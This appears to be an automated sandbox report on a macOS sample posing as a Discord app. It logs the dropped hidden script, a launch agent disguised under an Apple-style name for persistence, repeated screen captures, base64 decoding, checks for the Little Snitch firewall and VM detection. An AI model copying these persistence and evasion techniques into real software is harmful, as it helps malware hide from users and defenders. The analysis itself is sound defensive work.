Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 584) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 587) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 594) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 599) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/sbin/screencapture (PID: 605)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 612)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 614)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 621)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 628)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 630)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 637)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 639)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 646)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 649)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 655)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 662)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 664)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 671)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/screencapture (PID: 678)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/system_profiler (PID: 570)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Reads user launchservices plist file containing default apps for corresponding file typesShow sources
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Writes shell script file to disk with an unusual file extensionShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Writes shell script file to disk with an unusual file extension: /Users/henry/.system/.systemkeeperJump to dropped file
Executes the "awk" command used to scan for patterns (typically in standard output)Show sources
Source: /bin/bash (PID: 569)Awk executable: /usr/bin/awk -> awk /UUID/ { print $3 }Jump to behavior
Reads data from the local random generatorShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 584)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 587)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 594)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 599)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 605)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 612)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 614)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 621)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 628)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 630)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 637)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 639)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 646)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 649)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 655)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 662)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 664)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 671)Random device file read: /dev/urandomJump to behavior
Source: /usr/sbin/screencapture (PID: 678)Random device file read: /dev/urandomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 575)Random device file read: /dev/urandomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 589)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 598)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 607)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 616)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 623)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 632)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 641)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 648)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 657)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 666)Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 673)Random device file read: /dev/urandom
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Uses the Python frameworkShow sources
Source: /usr/bin/python (PID: 566)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /Users/henry/.system/.systemkeeper (PID: 575)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /Users/henry/.system/.systemkeeper (PID: 589)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /Users/henry/.system/.systemkeeper (PID: 598)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 607)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 616)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 623)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 632)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 641)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 648)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 657)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 666)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /Users/henry/.system/.systemkeeper (PID: 673)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Writes property list (.plist) files to diskShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)XML plist file created: /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plistJump to dropped file

Boot Survival:

Creates memory-persistent launch services
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566) Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plist
Creates user-wide 'launchd' managed services aka launch agents
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566) Launch agent created, file created: /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plist

Hooking and other Techniques for Hiding and Protection:

Creates 'launchd' managed services aka launch agents with bundle ID names to possibly disguise malicious intentions
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566) Launch agent created, file created: /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plist
Executes the "base64" command used to encode or decode data (e.g. files, payloads)
Source: /bin/bash (PID: 565) Base64 executable: /usr/bin/base64 -> base64 -D

Malware Analysis System Evasion:

Reads the sysctl hardware model value (may be used for detecting VM presence)
Source: /usr/sbin/system_profiler (PID: 570) Sysctl read request: hw.model (6.2)

HIPS / PFW / Operating System Protection Evasion:

Checks if the firewall "Little Snitch" is running
Source: /bin/sh (PID: 580) Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 582) Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 592) Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 602) Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 610) Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 619) Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 626) Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 635) Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 644) Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 652) Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 660) Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 669) Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 676) Greps for Little Snitch: /usr/bin/grep -> grep Little Snitch

Language, Device and Operating System Detection:

Reads process information of other processes
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.581 -> queries PID 581
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.580 -> queries PID 580
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.579 -> queries PID 579
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.577 -> queries PID 577
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.576 -> queries PID 576
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.575 -> queries PID 575
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.571 -> queries PID 571
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.569 -> queries PID 569
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.568 -> queries PID 568
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.567 -> queries PID 567
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.566 -> queries PID 566
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.563 -> queries PID 563
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.562 -> queries PID 562
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.561 -> queries PID 561
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.552 -> queries PID 552
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.550 -> queries PID 550
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.545 -> queries PID 545
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.543 -> queries PID 543
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.542 -> queries PID 542
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.516 -> queries PID 516
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.513 -> queries PID 513
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.511 -> queries PID 511
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.510 -> queries PID 510
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.483 -> queries PID 483
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.454 -> queries PID 454
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.453 -> queries PID 453
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.452 -> queries PID 452
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.451 -> queries PID 451
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.443 -> queries PID 443
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.442 -> queries PID 442
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.439 -> queries PID 439
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.427 -> queries PID 427
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.426 -> queries PID 426
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.425 -> queries PID 425
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.424 -> queries PID 424
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.423 -> queries PID 423
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.422 -> queries PID 422
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.421 -> queries PID 421
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.416 -> queries PID 416
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.412 -> queries PID 412
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.407 -> queries PID 407
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.401 -> queries PID 401
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.397 -> queries PID 397
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.396 -> queries PID 396
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.395 -> queries PID 395
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.390 -> queries PID 390
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.389 -> queries PID 389
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.387 -> queries PID 387
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.384 -> queries PID 384
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.383 -> queries PID 383
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.382 -> queries PID 382
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.381 -> queries PID 381
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.380 -> queries PID 380
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.378 -> queries PID 378
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.377 -> queries PID 377
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.376 -> queries PID 376
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.375 -> queries PID 375
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.373 -> queries PID 373
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.371 -> queries PID 371
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.370 -> queries PID 370
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.366 -> queries PID 366
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.365 -> queries PID 365
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.364 -> queries PID 364
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.361 -> queries PID 361
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.360 -> queries PID 360
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.359 -> queries PID 359
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.357 -> queries PID 357
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.356 -> queries PID 356
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.355 -> queries PID 355
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.354 -> queries PID 354
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.352 -> queries PID 352
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.351 -> queries PID 351
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.350 -> queries PID 350
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.349 -> queries PID 349
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.348 -> queries PID 348
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.345 -> queries PID 345
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.344 -> queries PID 344
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.343 -> queries PID 343
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.342 -> queries PID 342
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.341 -> queries PID 341
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.340 -> queries PID 340
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.339 -> queries PID 339
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.338 -> queries PID 338
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.334 -> queries PID 334
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.331 -> queries PID 331
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.330 -> queries PID 330
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.329 -> queries PID 329
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.328 -> queries PID 328
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.327 -> queries PID 327
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.321 -> queries PID 321
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.320 -> queries PID 320
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.319 -> queries PID 319
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.318 -> queries PID 318
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.317 -> queries PID 317
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.316 -> queries PID 316
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.315 -> queries PID 315
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.314 -> queries PID 314
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.313 -> queries PID 313
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.312 -> queries PID 312
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.311 -> queries PID 311
Source: /bin/ps (PID: 578) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.310 -> queries PID 310
Reads hardware related sysctl values
Source: /usr/sbin/system_profiler (PID: 570) Sysctl read request: hw.cpu_freq (6.15)
Source: /usr/sbin/system_profiler (PID: 570) Sysctl read request: hw.memsize (6.24)
Reads the system's hostname
Source: /bin/bash (PID: 563) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 572) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 573) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 574) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 576) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 577) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 590) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 600) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 608) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 617) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 624) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 633) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 642) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 650) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 658) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 667) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 674) Sysctl requested: kern.hostname (1.10)
Reads the system or server version plist file
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 575) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 575) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 589) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 589) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 598) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 598) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 607) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 607) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 616) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 616) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 623) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 623) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 632) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 632) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 641) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 641) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 648) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 648) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 657) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 657)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 666)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 666)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 673)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 673)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist


Runtime Messages

Command:open
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph


Legend:

  • Process
  • Signature
